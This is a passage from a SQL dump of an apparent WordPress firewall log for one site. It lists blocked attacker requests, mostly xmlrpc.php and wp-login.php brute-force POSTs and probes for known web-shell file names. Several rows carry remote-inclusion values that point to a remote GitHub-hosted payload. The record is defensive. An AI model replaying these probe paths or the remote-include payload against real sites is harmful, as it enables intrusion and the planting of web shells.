Firefox\\/96\"}','DN0nYaiWl98omH4KZQLCywk5',0,1666071514.2530,11547,'','POST',403,0,515,0,1,'',0),('167.172.81.8',2813088008,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AcaNioKR1f2eFGUbWO6xjLPH',0,1666070690.0132,2220,'','POST',403,0,515,0,1,'',0),('185.104.44.58',3110612026,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lSo6Ep9mH2ue1q7gfxiJYRIN',0,1666070171.6170,2724,'','POST',403,0,515,0,1,'',0),('177.52.160.32',2973016096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dNq081n53BwzVuvRGhT2rCXL',0,1666070417.2765,18846,'','POST',403,0,515,0,1,'',0),('128.199.205.115',2160577907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AZCuXsGN6E1ltTLpagoc4Yhq',0,1666069597.9341,19112,'','POST',403,0,515,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','exlZocjLqISgVnwrkD1Ez0Fp',0,1666076235.0746,285,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yUSiMjVbPRqkTpGmwlaDu2LI',0,1666076230.3436,299,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dYPvCk2uoAebx15TItcQFinq',0,1666076224.9363,1233,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XA9v1QNR3rEpM5YnVtq7ewOZ',0,1666076220.6305,330,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4Ou5cPo7yrtAjMsgLJvl6nHp',0,1666076187.4032,11709,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qK1n85fe6SNItHJk7u9dmvbV',0,1666076035.8763,319,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','EXok5CQIUpJms0h64xatqgMP',0,1666075993.1286,314,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uPaZgbrIHDqdQm9XTCl3t5JY',0,1666075992.4168,321,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GfDhvSQ0xLtIM5CN1JsaTBe8',0,1666075910.8976,1428,'','GET',403,0,700,0,1,'',0),('194.56.190.57',3258498617,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Q0muxS8MkPj6opafKrAcZY2U',0,1666075889.1447,19692,'','POST',403,0,515,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nwDKXNx5tQZFy3cTiUSq6plW',0,1666075660.6166,5380,'','GET',403,0,700,0,1,'',0),('103.116.16.173',1735659693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','J1L2V8PSjbrlmufoTMnpgZzE',0,1666075540.3757,20820,'','POST',403,0,515,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lakzRIOGdSAEKQCnhtVFPbMH',0,1666075550.6711,9766,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PTdtQacKSnBh3b1kHyvWMmui',0,1666075537.0301,11830,'','GET',403,0,700,0,1,'',0),('13.233.37.202',233383370,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0P1LH4RAXzOJc7E5DyY8CTVj',0,1666075209.8022,18107,'','POST',403,0,515,0,1,'',0),('13.233.37.202',233383370,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FCXpDqkJThNg6RSyVnQjubZB',0,1666074575.2774,20928,'','POST',403,0,515,0,1,'',0),('51.159.57.26',866072858,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MdU4NCyXHpRvgZcaA1ekQErn',0,1666074264.6028,21816,'','POST',403,0,515,0,1,'',0),('167.71.216.37',2806503461,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MH3lLdbJ0R54C9DF1KfOI8vi',0,1666073933.3818,19189,'','POST',403,0,515,0,1,'',0),('34.143.243.10',579859210,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7ZLPlVYo14ydRbqrc6AuhtQN',0,1666073627.8681,20496,'','POST',403,0,515,0,1,'',0),('188.164.193.195',3164914115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0CvRjHspdIK6riAGOEZyFaJD',0,1666073335.8282,19048,'','POST',403,0,515,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6NERxezChP0WLQOn2rGy9AZw',0,1666076879.4132,379,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fpYIuFMAbo3SRCVLcX8GhtD4',0,1666076849.1255,308,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sK4Q5Na1DWOyLp3izIo0rEX6',0,1666076824.0714,417,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','B42AC6D5kwrK8h0uRvtIeJq9',0,1666076810.4815,287,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','VmxZw1iSeNjz3ocY9yuTgILW',0,1666076784.7532,296,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2efw9xJh6RpIKLXWdA7O0oQH',0,1666076753.2437,11321,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CO1ZeGV59LbE2R3thXUYNFlH',0,1666076634.5129,362,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ta2Gwk81IhmM6BsTQ5vSYqOD',0,1666076623.8808,399,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','s1XW5ZEByUGg6Yj7nixHfLR3',0,1666076578.8241,720,'','GET',403,0,700,0,1,'',0),('168.119.227.50',2826429234,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YxILtn42oJuFchOzUyQZPK0j',0,1666076562.7356,10078,'','POST',403,0,515,0,1,'',0),('103.116.16.173',1735659693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Zyjmvfew67zA0sPdrgWMNFuO',0,1666083895.9473,19227,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eh67VuOn3KyTjMD0Nm95qWPX',0,1666083145.5504,20130,'','POST',403,0,515,0,1,'',0),('51.89.119.182',861501366,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','lzkuYL5gTbW2ErCH7NnUGjhJ',0,1666082739.0534,321,'','GET',403,0,700,0,1,'',0),('51.89.119.182',861501366,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','xuPrG9q0zpWoRQUvbfahBlmj',0,1666082723.1908,11606,'','GET',403,0,700,0,1,'',0),('35.195.135.67',600016707,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DYChwALu9djNp7nfFZItP3sV',0,1666082358.7966,20153,'','POST',403,0,515,0,1,'',0),('124.158.12.83',2090732627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JVE46ud8oWFlMXnAkcB2IQPm',0,1666081601.1894,19055,'','POST',403,0,515,0,1,'',0),('103.221.220.140',1742593164,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Kny7NvocZl8tkHWI1MeisBpD',0,1666080861.3239,18769,'','POST',403,0,515,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tJgaS1OZdbRVMw2uQxm9oPFH',0,1666081246.8388,19157,'','POST',403,0,515,0,1,'',0),('47.74.17.225',793383393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','svtARHX0CSfqUlcDge7jwyEp',0,1666080103.5754,18410,'','POST',403,0,515,0,1,'',0),('143.110.176.116',2406396020,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','v5jBfdPKYqe0nxEHwFRcViTG',0,1666087042.0323,18598,'','POST',403,0,515,0,1,'',0),('198.12.254.32',3322740256,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','P0CQ3GVu6shjvFYLA7MNzxn4',0,1666086653.2773,17783,'','POST',403,0,515,0,1,'',0),('46.235.40.122',787163258,'','http://cteisys.com/images/izanami.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','Z2og7AGEpvWB4jRxNJPDfw8e',0,1666086341.1335,317,'','GET',403,0,700,0,1,'',0),('188.164.193.195',3164914115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','J91NcfHoRWdSYlaw7GD40iCO',0,1666084694.2423,19690,'','POST',403,0,515,0,1,'',0),('46.235.40.122',787163258,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','eMjNfQBwAU3JXV9ZrRuiFT1v',0,1666086314.5492,11739,'','GET',403,0,700,0,1,'',0),('165.22.89.6',2769705222,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UeyF1GX5CmgJMiDd0sHljNw3',0,1666084286.0294,19132,'','POST',403,0,515,0,1,'',0),('167.172.79.125',2813087613,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5aTAXKIQsJlheF18RfrpyNzD',0,1666090262.8319,2680,'','POST',403,0,515,0,1,'',0),('198.136.54.132',3330815620,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rYvbt5M61wNh2gRKzne7jH3m',0,1666089873.1429,7326,'','POST',403,0,515,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/about.php','','{\"1\":\"python-requests\\/2.27.1\"}','k6VU9XyTmexrwiQo1qDtjcpv',0,1666089659.0052,12036,'','GET',403,0,700,0,1,'',0),('167.71.111.16',2806476560,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Mt6n2rIxRGOHTm9Zs1dAVqzD',0,1666088245.7283,18777,'','POST',403,0,515,0,1,'',0),('104.244.77.192',1760841152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','U4TqmNuHoERYv59kjlrehGLV',0,1666087361.3304,1187,'','POST',403,0,600,0,1,'',0),('64.235.231.20',1089201940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','j3x4ZCmzctWlGqOvT9rEXDbU',0,1666087463.9488,2480,'','POST',403,0,515,0,1,'',0),('51.255.64.58',872366138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KotpTcs7eCdzEnvUaBFymQgJ',0,1666094039.1913,19164,'','POST',403,0,515,0,1,'',0),('198.136.54.132',3330815620,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eDWxY4oUTQwc9ZOS6vgdX8yN',0,1666093187.8684,20362,'','POST',403,0,515,0,1,'',0),('116.62.155.4',1950259972,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','f8YlFQZoPy54AtSEjXa2RdKB',0,1666092744.0817,20013,'','POST',403,0,515,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MJDA6N1iw5Ergc7lCkLhnuSm',0,1666091933.0594,18706,'','POST',403,0,515,0,1,'',0),('5.101.157.82',90545490,'','http://cteisys.com/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/13.1.2 Mobile\\/15E148 Safari\\/604.1\"}','wTvP7Ve2S4Mi8B1fkc0ZKALD',0,1666092417.8412,11688,'','GET',403,0,700,0,1,'',0),('80.77.135.125',1347258237,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oagiYvZMuhmeGT92DArt1765',0,1666091503.8892,12334,'','POST',403,0,515,0,1,'',0),('80.76.51.29',1347171101,'','https://cteisys.com/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','udkCxDtHE51XosWmzLeK8T2P',0,1666098051.0514,278,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','M081tHjsLBcDEOJWFdhry2SC',0,1666098037.3722,11594,'','GET',403,0,700,0,1,'',0),('80.251.219.111',1358682991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','x3n2rkPeNYtowJgSICBfhbUj',0,1666096769.6953,18377,'','POST',403,0,515,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wz4pT8eqr0xVl7RjUtfMWg5O',0,1666096334.2283,31966,'','POST',403,0,515,0,1,'',0),('72.167.225.151',1218961815,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wQLZYEf2czntlJjKTbS9rBIM',0,1666095707.8642,20202,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','LdPqhN7XpOQsKDTb5lkUMfHr',0,1666095318.0467,19330,'','POST',403,0,600,0,1,'',0),('110.42.210.9',1848300041,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XVeNbIglUGT3mHivsxrtMBoA',0,1666094427.7593,18987,'','POST',403,0,515,0,1,'',0),('81.88.52.210',1364735186,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sn5b1wLTKq2W7fomudrMjJCN',0,1666099689.3602,483,'','POST',403,0,600,0,1,'',0),('85.31.46.140',1428106892,'','https://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','pWhyTUOFSbqQw13B7Mo2zN0u',0,1666099145.1389,326,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7tkECDvBHoQy219JrgGLO5wp',0,1666099128.6154,12487,'','GET',403,0,700,0,1,'',0),('18.229.212.101',317052005,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nYI7QUq40hXSmGwfuFd8xic6',0,1666098827.9688,814,'','POST',403,0,600,0,1,'',0),('178.128.54.239',2994747119,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','n0DJocXr2U3LIYfQxG7pSvCO',0,1666098065.4674,7356,'','POST',403,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','0uP9qkWIN1majYULcnVi4x6G',0,1666107890.2851,315,'','POST',403,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','8CbT32FzfwESBWo47edVPKnx',0,1666107886.6520,722,'','POST',404,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','E0LjIH6tJR8blrf1vTzcOkoS',0,1666107888.4786,598,'','POST',404,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','I7NZcjqKC2GPahd3nQROUimS',0,1666107885.1387,417,'','POST',404,0,515,0,1,'',0),('104.244.77.192',1760841152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','utmV60zC2JoNy38PH1l7eWpf',0,1666103031.5136,1422,'','POST',403,0,600,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','oqLBRQXNmCpOWglVJTfykde9',0,1666107883.2413,525,'','POST',404,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','l1in3zdGJOCY2vuNmcsgAorL',0,1666107881.2521,392,'','POST',404,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','wKOMphHQktGJRoX38vxN9dir',0,1666107879.3162,406,'','POST',404,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','ibXGkUVwdJ6CnsEeA7YItxDr',0,1666107876.6201,396,'','POST',404,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','XFR0AecPC5DS7d1vwyjqBfpk',0,1666107874.1745,392,'','POST',404,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','LIVOAemHUuyJCoi6bpzGrjXd',0,1666107872.9053,391,'','POST',404,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','9eNLcM8rdQD6qO7jPvyfmWlS',0,1666107871.4367,419,'','POST',404,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 